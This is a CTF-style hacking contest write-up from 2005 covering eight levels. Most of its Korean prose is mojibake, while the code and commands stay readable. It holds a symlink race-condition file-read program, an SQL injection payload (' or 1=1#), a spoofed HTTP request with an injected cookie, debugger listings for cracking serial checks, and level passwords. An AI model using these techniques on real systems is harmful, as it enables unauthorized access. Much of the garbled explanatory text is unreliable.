[Document Information]
 :: Title  ::  3ȸ õб ȣ 佺Ƽ 
 :: Date   :: 2005. 11. 28
 :: Author :: singi
 :: Contact:: E-Mail : sjh21a@hotmail.com
              Homepage : http://work.hackerschool.org/~sjh21a



[Index] 
 
0x00. ȸ .
0x01. Level1 ( ⺻   )
0x02. Level2 (Ưڷ ̷ 丮 /Race Condition ⺻ )
0x03. Level3 (4  Ǯ,   α׷ Է)
0x04. Level4 (simple reversing)
0x05. Level5 (guessing & simple cookie sniffing & spoofing)
0x06. Level6 (IP header checksum calculation)
0x07. Level7 (simple sql query injection)
0x08. Level8 (hard cracking (simple?))
0x09. ġ鼭.






[0x00. ȸ]

  ȸ    ٲ г ȫ(?)   ߴµ

 ƴϰ Ի ϰ Ǿ׿....OTL



[0x01. Level1]

Level1 ȿ    ϴ.

 20µ,   18 ľ߸   ߽ϴ.

ڽ ߴ 鵵 ۸  ̿ ˻ϴ Ʋ  ҽϴ.

 ˰ ִ 鵵 ڽŰ   ׷  ϴ.

 ￡  

Ʈũ  ̿µ  κ   ־ϴ.

ڼ    , 

 ٸ    ؼ   ̴.

snmp   ƴ  .

sis ʱ ƴ .

޽ ϴ  ˸  뷫  ϴ.

 縦 س ʾƼ   ʴ±.

    Level2     ְ Ǿϴ.

pass : no surprise



[0x02. Level2]

Level2 Ưڷ  濡  ϴ  password  

 о ϴ.

α غ, Hint 

Ǹ  𾾴 ڽ   йȣ  ؾ ڽŸ
  桯   ξ. ׷ Ǹ  ڱⰡ 
 濡  ϴ ̴.  йȣ ãּ~!

̾ϴ.

ϴ vi  ls  丮   ⺻ 丮 ܿ ^B, ^V, ?  丮  ߽ϴ.

vi  Ưڷ ̷  غ  ^B  丮   ̶ 丮 ְ

׾ȿ passwd   ְ ̰ о     ߽ϴ.

 passwd  ⺻ ۹̼ 

-r--r----- root     root   passwd ???? 

Ϲ     ϴ. ϴ    ϰ vi  ̿ؼ ƴ

 Ư 丮  ߽ϴ.

cd ɿ perl   ָ Ǵµ.

cd `perl -e 'print "\x??"'` ̷ ??  ´ 16 ڸ Էϸ ˴ϴ.

^B  ^V Ƿ, 16 ǥ

^B = 02, ^V = 16 Դϴ.

chamber of secret 丮 ̸ ڿ ̽ , ϰ tab ν Ŀ߽ϴ.

 passwd  ۹̼  ʾҰ(  ־) tmp  .sys  丮 ϴ.

Խǿ  ؼ, "Ư Ȳ     ִ"  Ʈ  

race condition   ߽ϴ. ٷ  ҽ   ׽ϴ. ҽ

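1
#include <stdio.h>
#include <stdlib.h>   /* system() */

int main(void)
{
    /* Keep trying to read the password file in a tight loop. */
    while (1) {
        system("cat ../../password");
    }
}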
 

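2
#include <stdio.h>
#include <unistd.h>   /* symlink(), unlink() */

int main(void)
{
    /* Repeatedly create and remove a symlink "pass" that points at the password file. */
    while (1) {
        symlink("../../password", "pass");
        unlink("./pass");
    }
}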
(Ȥ  2  Ƚϴ)

 Ŀ ͹̳ â Ʒ  ޽  Ǿϴ.


good job :)

password is "info security"

н ޼  

$ ./1 2>/dev/null <-- ɾ

ϰ н常  ˴ϴ.

pass : info security




[0x03. Level3]

3 ϸ level3̶ α׷ ణ Hint ־ϴ.

Hint 

x*x*x*x - 34*x*x*x - 340*x*x + 1858*x + 12915

        a < b < c < d

̷ ̾ϴ. 

        "a < b < c < d"   ؾ н尡  ٴ  ˾ҽϴ.

level3 ̶ α׷ α׷  ߿ Ư ñ׳ ctrl+c, ctrl+z, ctrl+\ 

Էϸ ctrl+c = a--, ctrl+z = c++, ctrl+\ = b-- ׸ d  0~60   ˴ϴ.

d 60 Ǹ α׷ ᰡ .

*Ư ñ׳ c,z   ˾Ƴ, \  α׷  ߽ϴ.*

* 2,3,4  ǥ þұ  ʿ ҽ ÷ϵ ϰڽϴ.*

Խ    4   ϶ ϴ.

(ڼؼ  ã -_-;)

   2 ĵ 𸨴ϴ. ׷  ее ϽŴٴ mathematica  α׷

   ߽ϴ.   {{x -> -9}, {x -> -5}, {x -> 7}, {x -> 41}}

, a < b < c < d  ؼ a=-9, b=-5, c=7, d=41  ˴ϴ.

a  ctrl+c  9  -9 ְ, b  c    ݴϴ. 

21 ȿ Է ؾ մϴ.  ׸   d  41 Ǹ   н尡  ˴ϴ.

pass : rage against the cracker




[0x04. Level4]

level4   Ư   ޾ҽϴ.

α׷ ٿ ް,    ip  Է ϶  ϴ.

ƹ Է ص ƹ  , ollydbg  α׷  Ǿϴ.

ϴ search for -> all referenced text strings  ؼ

α׷ ϰ ִ ڿ ҽϴ.

0592842722, 2027148262, 2320512323, 2221114222 

HTTPTEST, .index.bak, GET, index.html, GET

   ҽϴ. α׷     ʿ ߴ

"Get Index!!"  ̸     level4 α׷ Ư ip   ؼ

.index.bak  index.html ޾ƿ α׷ ߽ϴ.

׷  ASCII "0592842722"  break point  ɾ α׷  ׽ϴ. (f9)

00401D9E  |. E8 6CF2FFFF    CALL level4.0040100F

κп α׷  Ǿϴ. âٰ ƹ ڳ, ڸ Է ҽϴ.

׷  break point(bp)    ߰ Ǵµ,

004012D0  |. 68 8C004200    PUSH level4.0042008C                     ;  ASCII "0592842722"
004012D5  |. 8D95 D403FEFF  LEA EDX,DWORD PTR SS:[EBP+FFFE03D4]
004012DB  |. 52             PUSH EDX
004012DC  |. E8 8F070000    CALL level4.00401A70
004012E1  |. 83C4 08        ADD ESP,8
004012E4  |. 68 7C004200    PUSH level4.0042007C                     ;  ASCII "2027148262"
004012E9  |. 8D85 DE03FEFF  LEA EAX,DWORD PTR SS:[EBP+FFFE03DE]
004012EF  |. 50             PUSH EAX
004012F0  |. E8 7B070000    CALL level4.00401A70
004012F5  |. 83C4 08        ADD ESP,8
004012F8  |. 68 6C004200    PUSH level4.0042006C                     ;  ASCII "2320512323"
004012FD  |. 8D8D E803FEFF  LEA ECX,DWORD PTR SS:[EBP+FFFE03E8]
00401303  |. 51             PUSH ECX
00401304  |. E8 67070000    CALL level4.00401A70
00401309  |. 83C4 08        ADD ESP,8
0040130C  |. 68 5C004200    PUSH level4.0042005C                     ;  ASCII "2221114222"

 ڿ ־ϴ. ϴ Ʒʿ   Ǵ  ־   ׽ϴ.

00401340  |> 8B8D D003FEFF  /MOV ECX,DWORD PTR SS:[EBP+FFFE03D0]
00401346  |. 83C1 01        |ADD ECX,1
00401349  |. 898D D003FEFF  |MOV DWORD PTR SS:[EBP+FFFE03D0],ECX
0040134F  |> 83BD D003FEFF > CMP DWORD PTR SS:[EBP+FFFE03D0],4
00401356  |. 7D 60          |JGE SHORT level4.004013B8
00401358  |. 6A 03          |PUSH 3
0040135A  |. 8B95 D003FEFF  |MOV EDX,DWORD PTR SS:[EBP+FFFE03D0]
00401360  |. 6BD2 0A        |IMUL EDX,EDX,0A
00401363  |. 8D8415 D403FEF>|LEA EAX,DWORD PTR SS:[EBP+EDX+FFFE03D4]
0040136A  |. 0385 D003FEFF  |ADD EAX,DWORD PTR SS:[EBP+FFFE03D0]
00401370  |. 50             |PUSH EAX
00401371  |. 8D8D FC03FEFF  |LEA ECX,DWORD PTR SS:[EBP+FFFE03FC]
00401377  |. 51             |PUSH ECX
00401378  |. E8 E3070000    |CALL level4.00401B60
0040137D  |. 83C4 0C        |ADD ESP,0C
00401380  |. C685 0004FEFF >|MOV BYTE PTR SS:[EBP+FFFE0400],0
00401387  |. 83BD D003FEFF >|CMP DWORD PTR SS:[EBP+FFFE03D0],3
0040138E  |. 74 09          |JE SHORT level4.00401399
00401390  |. C685 FF03FEFF >|MOV BYTE PTR SS:[EBP+FFFE03FF],2E
00401397  |. EB 07          |JMP SHORT level4.004013A0
00401399  |> C685 FF03FEFF >|MOV BYTE PTR SS:[EBP+FFFE03FF],0
004013A0  |> 8D95 FC03FEFF  |LEA EDX,DWORD PTR SS:[EBP+FFFE03FC]
004013A6  |. 52             |PUSH EDX
004013A7  |. 8D85 0404FEFF  |LEA EAX,DWORD PTR SS:[EBP+FFFE0404]
004013AD  |. 50             |PUSH EAX
004013AE  |. E8 CD060000    |CALL level4.00401A80
004013B3  |. 83C4 08        |ADD ESP,8
004013B6  |.^EB 88          \JMP SHORT level4.00401340

̰    ε, f8  Ű鼭   059.027.205.111 ̶ Ǹ  ݴϴ.

, ƹ ڿ̳ Է ص  ڿ Է .

׸ ASCII "~~" 鵵   ִµ, ̰ ؼ Ʒ loop  뷫 ˰    ֽϴ.

ASCII ڵ 0592842722   2027148262   2320512323   2221114222

  ø  ѹ    +1  Ǽ Ǹ  ݴϴ. 

0592842722 ---> 059

2027148262 ---> 027 ( տ 1 jump +1)

2320512323 ---> 205 ( տ 2 jump +2)

2221114222 ---> 111( տ 3 jump +3)

059.027.205.111 (level2   IP)   ϴ.  Ƿ index.bak  index.html  ִ α׷Դϴ.
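
The string decoding traced above, rebuilt as an added C example (not code from the level4 binary or from the original write-up). It assumes the helpers at 00401A70, 00401B60 and 00401A80 behave like strcpy, strncpy and strcat; decode_ip and normalize_ip are names chosen here.

```c
#include <stdio.h>
#include <string.h>

/* The four strings pushed at 004012D0-0040130C, as shown in the listing. */
static const char *const LEVEL4[4] = {
    "0592842722", "2027148262", "2320512323", "2221114222"
};
static char padded[16], plain[16];

/* Mirrors the loop at 00401340-004013B6. The strings sit back to back with a
 * stride of 0x0A, and round i copies 3 characters from offset i*10 + i, so
 * the window slides one character further into each string. */
static const char *decode_ip(const char *const parts[4], char *out, size_t outlen)
{
    char table[41] = {0};
    char octet[5];

    for (int i = 0; i < 4; i++)
        memcpy(table + i * 10, parts[i], 10);

    out[0] = '\0';
    for (int i = 0; i < 4; i++) {                 /* CMP counter,4 / JGE */
        memcpy(octet, table + i * 10 + i, 3);     /* PUSH 3: three characters */
        octet[3] = (i == 3) ? '\0' : '.';         /* 0x2E after all but the last */
        octet[4] = '\0';
        strncat(out, octet, outlen - strlen(out) - 1);
    }
    return out;
}

/* Parse every group as decimal and drop the zero padding. Done explicitly
 * because inet_aton()-style parsers treat a leading 0 as an octal prefix. */
static const char *normalize_ip(const char *in, char *out, size_t outlen)
{
    unsigned a, b, c, d;

    if (sscanf(in, "%3u.%3u.%3u.%3u", &a, &b, &c, &d) != 4)
        return NULL;
    if (a > 255 || b > 255 || c > 255 || d > 255)
        return NULL;
    snprintf(out, outlen, "%u.%u.%u.%u", a, b, c, d);
    return out;
}

int main(void)
{
    printf("%s\n", decode_ip(LEVEL4, padded, sizeof padded));
    printf("%s\n", normalize_ip(padded, plain, sizeof plain));
    return 0;
}
```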

 鼭 ٸ  . 

004013DB  |. 8BF4           MOV ESI,ESP
004013DD  |. 6A 00          PUSH 0
004013DF  |. 6A 00          PUSH 0
004013E1  |. 6A 00          PUSH 0
004013E3  |. 6A 00          PUSH 0
004013E5  |. 68 50004200    PUSH level4.00420050                     ;  ASCII "HTTPTEST"
004013EA  |. FF15 A0634200  CALL DWORD PTR DS:[<&WININET.InternetOpe>;  WININET.InternetOpenA


Ʊ Ҵ HTTPTEST  InterOpenA  Լ Ǿ. ̰ API Լ Դϴ.

 ڵ Ҵ  Է Ǿ.

׸  Ʒ

00401407  |. 6A 00          PUSH 0
00401409  |. 6A 00          PUSH 0
0040140B  |. 6A 03          PUSH 3
0040140D  |. 68 9C004200    PUSH level4.0042009C
00401412  |. 68 9C004200    PUSH level4.0042009C
00401417  |. 6A 00          PUSH 0
00401419  |. 68 EC364200    PUSH level4.004236EC
0040141E  |. 8B45 FC        MOV EAX,DWORD PTR SS:[EBP-4]
00401421  |. 50             PUSH EAX
00401422  |. FF15 9C634200  CALL DWORD PTR DS:[<&WININET.InternetCon>;  WININET.InternetConnectA


InterConnectA  Լ ־ϴ. ̰ ڵ   ߽ϴ.

InternetConnect(hInternet,"server",0,"","",INTERNET_SERVICE_HTTP,0,0);

ڵ ϳϳ  ҽϴ.

00401407  |. 6A 00          PUSH 0 --> 0
00401409  |. 6A 00          PUSH 0 --> 0

0040140B  |. 6A 03          PUSH 3 --> INTERNET_SERVICE_HTTP

0040140D  |. 68 9C004200    PUSH level4.0042009C --> ""
00401412  |. 68 9C004200    PUSH level4.0042009C --> ""

00401417  |. 6A 00          PUSH 0 --> 0

00401419  |. 68 EC364200    PUSH level4.004236EC ??? (ζ 059.027.205.111  ־   Դϴ.)

0040141E  |. 8B45 FC        MOV EAX,DWORD PTR SS:[EBP-4]
00401421  |. 50             PUSH EAX  <--- hInternet 

004236ec     Ų , server ּҰ ־     ҽϴ.

004236E8  00 00 40 00 00 00 00 00  ..@.....
004236F0  00 00 00 00 00 00 00 00  ........
004236F8  00 00 00 00 00 00 00 00  ........

..ƹ͵ ϴ. *( α׷ ȭ ƹ͵ Ƚ׽ϴ)

׷ Ƿ  ּҿ ip ּҸ ־ , 

00401516  |. C68415 0802FFF>|MOV BYTE PTR SS:[EBP+EDX+FFFF0208],0

 κ 뿡 ߾ϴ. Ƹ ip  ߸   ҽϴ.

 α׷    ȸ   ̷ ܵξϴ.

ٸ Ƿ  е α׷ ļ  ˾Ƴ̰,   http://59.27.205.111/index.html 

http://59.27.205.111/.index.bak  û ҽϴ.    ۵ ȵǴ. ( ̻ ִ  ˾ҽϴ OTL)

59.27.205.111   Ȯϴ apache  ϴ. (߿ Ȯ ϴ   Ǵ.)

׷ level2  /var/www/html   ؼ .index.bak   ҽϴ. ( ϴ;; ׶ ȵƾ~)

 base64 ѹ encoding  ¿  php Լ  ˾Ƴϴ.

<?php
$str="ISEhTGV2ZWw0ICEhIQ0KUGFzc3dvcmQgOiBrbm93IHlvdXIgZW5lbXk=";
echo base64_decode($str);
?>

$ php base64.php
!!!Level4 !!!
Password : know your enemy $


pass : know your enemy

level4 ps : ٸ е  α׷ ޾ƿ ̴ ñ մϴ Ф ƴϸ  ΰǰ?



[0x05. Level5]

*̹     ߴ Դϴ.
*id ˾Ƴ  ϰ, password ˾Ƴ  ϰ.. ̹ ȸ ߿   밡 ߽ϴ.

level5   ϸ ȭ鿡 id  pw   , guest page | level5 page ֽϴ.

ϴ form     sql injection  õ  ʾҽϴ  (¥      ߽ϴ;;)

  ħ Ʈ Դµ, guessing.. ϶ ſϴ.  ϱ ...id list   

wwwhack  crack غҽϴ.

id-list

guest
admin
member
auth
level05
user
nobody
test
tester
master
level5
hacker
account
login
administrator
anonymous

׷ ũ  ؼ     ִ ,   Ʈ ϳ Խϴ.

id guest ̰ pw  a*** ̾ϴ. (йȣ id  ° ô ߽ϴ...)

׸  Ŀ ߰ ۾ ʿϴٰ ־ϴ.

˾Ƴ id  pw  guest / asdf Դϴ. α  , guest page  ϴ н尡 asdf   ְ,

level5     user-agent  reffer  Security First, 192.168.?.??/level5.html  ٲ level5   Ǵ ſϴ.

* SecurityFirst    ϼż,  ϴ  ˰ ˻ ߾ϴ. mook ΰ monk   α׿ ణ  *

cookie sniffing  spoofing    achilles    õ ߽ϴ.

ϴ guest  login  Ŀ, guest page  ,   level5 page   ߽ϴ.

 cookie 

POST /level5/guqehdrhks/level5.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*
Referer: 192.168.111.222/level5.html
Accept-Language: ko
Proxy-Connection: Keep-Alive
User-Agent: SecurityFirst Explorer
Host: 59.27.205.110
Cookie: r_num=%5C%27+union+select+%2A+from%23; user=level5


Դϴ.

level5 page      н带 ˷־ϴ.

pass : plastic tree



[0x06. Level6]

level6 ip header  checksum   ϴ Դϴ.
ó    raw socket  鼭 sniffing  ϴ ̾µ

   ڿ source ip  destination ip  ٲ checksum  ٲ 

ȵ˴ϴ. ׷     Ǫ ε ۸ ˻ϸ ϴ  ɴϴ.



45  00  00  40  F5  DA  40  00  80  06  
??  ??  C0  A8  00  02  42  A1  27  C3  


    ϴ ˾ƾ մϴ. (Ŷ   Ŷ ϳ Ƽ ip header κ ø ˴ϴ.)

45 00  ip version  ihl (data offset) Ÿϴ.

00 40  total length. 0x40 -> 64

f5 da  identification(id) 0xf5da -> 62938

80  time to live(ttl)  Ÿϴ -> 0x80 -> 128

06  ip protocol  Ÿϴ. 06 -> IPPROTO_TCP

C0  A8  00  02 ̰ source ip : 192.168.0.2

42  A1  27  C3 ̰ destination ip : 66.161.39.195

 Ÿϴ.

 ù° header   ڽϴ.
0. checksum 0 ʱȭ Ѵ. (ĭ̴ pass)

1. IP   ؼ, 16Ʈ(2Ʈ) ǵ ش.

45 00 + 00 40 + F5 DA + 40 00 + 80 06 + C0 A8 + 00 02 + 42 A1 + 27 C3 = 3262E

 16Ʈ ǵ ô. 3262E(20Ʈ)

262E , 0003 = 3262E

  262E + 0003 = 2631

̷ν ip   ؼ 16Ʈ ǵ ߾ ־ϴ.

  1    մϴ.

0010 0110 0011 0001 <-- 2631

1101  1001 1100 1110 <--  
13(D)   9    12(C)  14(E)

* ù°     쿣  ڸ 0̾ 4ڸ  ȵ˴ϴ. ڿ    0 ߰ ָ ˴ϴ.*

ù° ĭ  D9 CE Դϴ.

ι° header      ϸ ˴ϴ.


45  00  00  3E  24  BD  00  00  80  11  
??  ??  3B  1B  CD  78  A8  7E  3F  01  

 Ȱ м غڸ

45 00  ip version  ihl (data offset) Ÿϴ.

00 3e  total length. 0x3E -> 62

24 bd  identification(id) 0x24bd ->9405

80  time to live(ttl)  Ÿϴ -> 0x80 -> 128

11  ip protocol  Ÿϴ. 11 -> ̾  ȳϴ  Ƹ UDP ̾ ...OTL..

3B 1B CD 78 ̰ source ip : 59.27.205.120

A8 7E 3F 01 ̰ destination ip : 168.126.63.1


 checksum ϴ   غ


45  00  + 00  3E  + 24  BD  + 00  00  + 80  11 + 3B  1B + CD  78 + A8  7E + 3F  01   = 2DA1E

 20Ʈ Ѿ

DA1E + 0002 = DA20 

̰  1   ϸ

1101 1010 0010 0000 <-- DA20

0010 0101 1101 1111 <---  

 2     5       13(D) 15(F)

 ι° ĭ  25 DF  ˴ϴ.

     н尡 ־ϴ.

pass : packet storm
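
The checksum steps worked by hand above (zero the field, add the 16-bit words, fold the carry back in, take the one's complement), as an added C example that is not part of the original write-up. The function names are chosen here; the two byte arrays are the headers from this level with the blank field set to 00 00, and ip_header_valid adds the receiver-side check.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Sum the header as big-endian 16-bit words and fold carries above bit 15
 * back into the low 16 bits (0x3262E -> 0x262E + 0x3 = 0x2631).
 * The length comes from the IHL nibble; skip_field leaves out bytes 10-11. */
static uint16_t folded_sum(const uint8_t *hdr, int skip_field)
{
    size_t len = (size_t)(hdr[0] & 0x0F) * 4;   /* IHL counts 32-bit words */
    uint32_t sum = 0;

    for (size_t i = 0; i < len; i += 2) {
        if (skip_field && i == 10)
            continue;                           /* checksum field counts as 0 */
        sum += (uint32_t)((hdr[i] << 8) | hdr[i + 1]);
    }
    while (sum >> 16)
        sum = (sum & 0xFFFF) + (sum >> 16);
    return (uint16_t)sum;
}

/* Value the sender writes into bytes 10-11: one's complement of the sum. */
static uint16_t ip_header_checksum(const uint8_t *hdr)
{
    return (uint16_t)~folded_sum(hdr, 1);
}

/* Writes the checksum into the header and returns it. */
static uint16_t fill_checksum(uint8_t *hdr)
{
    uint16_t c = ip_header_checksum(hdr);
    hdr[10] = (uint8_t)(c >> 8);
    hdr[11] = (uint8_t)(c & 0xFF);
    return c;
}

/* Receiver-side check: with the checksum included, the sum folds to 0xFFFF.
 * Any change to an address or other field without recomputing breaks this. */
static int ip_header_valid(const uint8_t *hdr)
{
    return folded_sum(hdr, 0) == 0xFFFF;
}

/* The two headers from this level; bytes 10-11 are the blanks (??). */
static uint8_t hdr1[20] = { 0x45,0x00,0x00,0x40,0xF5,0xDA,0x40,0x00,0x80,0x06,
                            0x00,0x00,0xC0,0xA8,0x00,0x02,0x42,0xA1,0x27,0xC3 };
static uint8_t hdr2[20] = { 0x45,0x00,0x00,0x3E,0x24,0xBD,0x00,0x00,0x80,0x11,
                            0x00,0x00,0x3B,0x1B,0xCD,0x78,0xA8,0x7E,0x3F,0x01 };

int main(void)
{
    printf("header 1: %04X\n", ip_header_checksum(hdr1));
    printf("header 2: %04X\n", ip_header_checksum(hdr2));
    return 0;
}
```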



[0x07. level7]

level7 ʹ ϰ(?) Ǯ ڼ  м  ߽ϴ.

̸ = name
 = nick
Ϲȣ = reg_num

̹  name ̳ nick Ǵ reg_num  sql query  
 b.php  ϰ ͸ ѷִ php  c.php Դϴ.

 c.php տ form  Է ͵ ҷɴϴ.

̶ ̴  ϸ

select id,nick,reg_num from quiz_table where reg_num='$reg_num'

name  nick â  غ,  ٸ  ޽  ʾұ 

ٸ name  nick  ڿ̳   ٸ ڰ 

"±׸ Ҽ ϴ."  ڿ , ߽ϴ.

׸   Ϲȣ(reg_num) Ƚϴ.

ϰ Ϲȣ  form  ' or 1=1#  ̿ؼ Ǯϳ.

̸  : singi
  : asdf
Ϲȣ : ' or 1=1#

  Է       Ȯ ϴ

̹ Է Ǿ ־    Ǹ鼭 level8 н嵵  Ǿϴ.

your information :

  : password is :
  : comeasyouare
Ϲȣ : 2002338720034713




[0x08. Level8]

level8    ϴ level4 ó Ư   ޾Ƽ

crack ϴ  ҽϴ. 

 ߿   SecurityFirst  key  ˾Ƴ ̰, 

  Ǫ  ƾ, ڵ  ϸ ȵǾϴ.

  Ȳ, ׷ ϴ Լ ƾ   ollydbg   ׽ϴ.

ϸ鼭 ˾Ƴ ,   1 Ʈ 2 fake  ֽϴ.

۵ϴ Ʈ ̸ Ư ڿ ƴϸ ø ¾Ƶ  ޽ ϴ.

level4   ϴ search for -> all referenced text strings  ؼ

α׷  ڿ ҽϴ.

ڿ 캸, Sorry, you are wrong  ڿ 3 ־ϴ.

 бⰡ ִٴ ̰.

ø ¾   ־ϴ. ϴ  

 ó "Sorry you are wrong"  bp  ɾϴ. ׸  Ų 

level8.exe  ǰ, ƹڿ Է ϰ Ȯ , bp  ɾ  ߾ϴ.

  ϸ

00401749  |. 68 44404000    PUSH level8.00404044                     ;  ASCII " Sorry You are wrong "
0040174E  |. E8 C1060000    CALL <JMP.&MFC42.#1200>
00401753  |> 6A 00          PUSH 0                                   ; /status = 0
00401755  |. FF15 CC314000  CALL DWORD PTR DS:[<&MSVCRT.exit>]       ; \exit


α׷  Ǳ ,  Լ ҷ   캸 ߽ϴ.

0040170C  /$ 55             PUSH EBP ̰  Ʒ  â

Local call from 004016e6   Ǵµ    Լ ҷٴ    ֽϴ.

Go to call from 004016e6  Ŭ ؼ  ö ҽϴ.

 ּ ó ɹ   б  ˾ ½ϴ.

004016E5  |. 51             PUSH ECX                                 ; /Arg1
004016E6  |. E8 21000000    CALL level8.0040170C                     ; \level8.0040170C
004016EB  |. 83C4 04        ADD ESP,4
004016EE  |> E8 C9010000    CALL level8.004018BC
004016F3  |. E8 71010000    CALL level8.00401869
004016F8  |. 8B95 6CFFFFFF  MOV EDX,DWORD PTR SS:[EBP-94]
004016FE  |. 52             PUSH EDX                                 ; /Arg1
004016FF  |. E8 A5000000    CALL level8.004017A9                     ; \level8.004017A9

0040170c   ޽, 004017a9  б Ǹ  ޽ ϴ.

ٷ  κ   Լε

004016D5  |> C785 6CFFFFFF >MOV DWORD PTR SS:[EBP-94],2
004016DF  |. 8B8D 6CFFFFFF  MOV ECX,DWORD PTR SS:[EBP-94]
004016E5  |. 51             PUSH ECX                                 ; /Arg1
004016E6  |. E8 21000000    CALL level8.0040170C                     ; \level8.0040170C


  ߿ 004016d5  jump ϴ  ãƼ 캸ҽϴ.

004016BE  |. 75 15          JNZ SHORT level8.004016D5

004016C7  |. 74 0C          JE SHORT level8.004016D5

ãƳ 鿡  bp    ٽ  ׽ϴ.

 ó 004016be   ߾ϴ.     004016bb  bp  ɾ

eax     ϴ ˾ƺҽϴ.

004016BB  |. 3B42 60        CMP EAX,DWORD PTR DS:[EDX+60] 

.. ollydbg ٰ  ̾ϴ.

Stack DS:[0012FEE4]=000004d2 <-- Է ø(1234)
EAX=10412f6a   <-- test  ùٸ serial 272707434

 ̶   Ʈ ִ     ߽ϴ.

*   , eax   ִ  ø Ȯϰ ׳ Էұ  ,

Ǯ̹    ߽ϴ.*

Ǿ Լ  ؼ Search for -> all intermodular calls 

α׷  Լ ҽϴ.

  ˾    Լ Ǿ  ã  ־ϴ.

004019ba κп strcmp Լ  Ǿµ   strcmp    

α׷ оϴ.

004019AE  |> 68 E8404000    /PUSH level8.004040E8                    ; /s2 = "sch_sf.exe"
004019B3  |. 8D8D F8FEFFFF  |LEA ECX,DWORD PTR SS:[EBP-108]          ; |
004019B9  |. 51             |PUSH ECX                                ; |s1
004019BA  |. E8 CD040000    |CALL <JMP.&MSVCRT.strcmp>               ; \strcmp

Ʊ Ҵ sch_sf.exe   strcmp  ڷ Ǿϴ. ׷  ̰ bp   

004019B3  |. 8D8D F8FEFFFF  |LEA ECX,DWORD PTR SS:[EBP-108]          ; |

    ڿ sch_sf.exe  ٲ ָ   Դϴ. (   ϴ ̶)

  , strcmp   ʾҽϴ. ٸ   غҽϴ.

׷  Ʊ   õ   ޽  ־   

ãƺҽϴ.  fake ϴ. 

00401869 <-- fake 1  κ

004018bc <-- fake 2  κ

 2 Լ fake  ,  ⿣   ޽ Ѵٰ  

  캸 ٸ κ ֽϴ.

< ƾ>
00401739  |. 8945 08        MOV DWORD PTR SS:[EBP+8],EAX
0040173C  |. 817D 08 238167>CMP DWORD PTR SS:[EBP+8],5678123
00401743  |. 75 0E          JNZ SHORT level8.00401753
00401745  |. 6A 00          PUSH 0
00401747  |. 6A 00          PUSH 0
00401749  |. 68 44404000    PUSH level8.00404044                     ;  ASCII " Sorry You are wrong "
0040174E  |. E8 C1060000    CALL <JMP.&MFC42.#1200>



< ƾ1>
0040189E  |. 8945 FC        MOV DWORD PTR SS:[EBP-4],EAX
004018A1  |. 817D FC 238167>CMP DWORD PTR SS:[EBP-4],5678123
004018A8  |. 74 0E          JE SHORT level8.004018B8
004018AA  |. 6A 00          PUSH 0
004018AC  |. 6A 00          PUSH 0
004018AE  |. 68 78404000    PUSH level8.00404078                     ;  ASCII " Sorry You are wrong "
004018B3  |. E8 5C050000    CALL <JMP.&MFC42.#1200>


< ƾ2>
004018F1  |. 8945 FC        MOV DWORD PTR SS:[EBP-4],EAX
004018F4  |. 817D FC 238167>CMP DWORD PTR SS:[EBP-4],5678123
004018FB  |. 74 0E          JE SHORT level8.0040190B
004018FD  |. 6A 00          PUSH 0
004018FF  |. 6A 00          PUSH 0
00401901  |. 68 90404000    PUSH level8.00404090                     ;  ASCII " Sorry You are wrong "
00401906  |. E8 09050000    CALL <JMP.&MFC42.#1200>


 ƾ JNE ,  ƾ  JE  ó ϴ.  "Sorry You are wrong"

 µ ʰ Ѿ . 

  strcmp   ǹ Ǯ  ƴ.

 ó ƿͼ 

00401F6E  |> 46             /INC ESI
00401F6F  |. 8975 8C        |MOV DWORD PTR SS:[EBP-74],ESI
00401F72  |. 8A06           |MOV AL,BYTE PTR DS:[ESI]
00401F74  |. 3AC3           |CMP AL,BL
00401F76  |. 74 04          |JE SHORT sch_sf.00401F7C
00401F78  |. 3C 22          |CMP AL,22
00401F7A  |.^75 F2          \JNZ SHORT sch_sf.00401F6E


 κп  ̸ üũ ϴ°Ͱ  ó ְ ־ϴ.

 ̻ ˾Ƴ ϰ, 004016BB  ٽ bp  ɰ

 Ʒ  Ǿ ִ ˾ ҽϴ.

004016C0  |. E8 6A020000    CALL level8.0040192F

strcmp   ִ Լ (?)  ۵Ǵ ּ ϴ.

 Լ Ǿ, ɻ strcmp ̱  strcmp ҽϴ.

004019AE  |> 68 E8404000    /PUSH level8.004040E8                    ; /s2 = "sch_sf.exe"
004019B3  |. 8D8D F8FEFFFF  |LEA ECX,DWORD PTR SS:[EBP-108]          ; |
004019B9  |. 51             |PUSH ECX                                ; |s1
004019BA  |. E8 CD040000    |CALL <JMP.&MSVCRT.strcmp>               ; \strcmp
004019BF  |. 83C4 08        |ADD ESP,8
004019C2  |. 85C0           |TEST EAX,EAX
004019C4  |. 75 07          |JNZ SHORT level8.004019CD
004019C6  |. C745 FC 010000>|MOV DWORD PTR SS:[EBP-4],1
004019CD  |> 8D95 D4FEFFFF  |LEA EDX,DWORD PTR SS:[EBP-12C]
004019D3  |. 52             |PUSH EDX                                ; /pProcessentry
004019D4  |. 8B85 D0FEFFFF  |MOV EAX,DWORD PTR SS:[EBP-130]          ; |
004019DA  |. 50             |PUSH EAX                                ; |hSnapshot = 000000B0 (window)
004019DB  |. E8 44060000    |CALL <JMP.&KERNEL32.Process32Next>      ; \Process32Next
004019E0  |. 85C0           |TEST EAX,EAX
004019E2  |.^75 CA          \JNZ SHORT level8.004019AE


Process32Next  Ǿ.

̸ "sch_sf.exe"  ٲ ϴ° ´µ

 ڸ, μ Ʈ ̸ sch_sf.exe  ־   մϴ.

, level8.exe  ̸ sch_sf.exe  ƴϾ, ٸ  ̸ sch_sf.exe ٲٰ

  , level8.exe   Ѽ,  ص  ޽  ˴ϴ.

 ñ Ǯȱ⿡ 8  ߽ϴ.

pass : 451238960





[0x09. ġ鼭]

, ؿ  ִ     Ǿ!!

  ^-^    ,   ٽ    ϴ.

  Ϸ ,   ʾҽϴ.

..ø Ѱ   ϳ׿. ׸Ϸ ϸ  ٵ,     ;(

 Ѱ   ּ

ٽ ѹ   ֽ õб е 帳ϴ.

  ߾ ǰڳ׿! bye bye~~



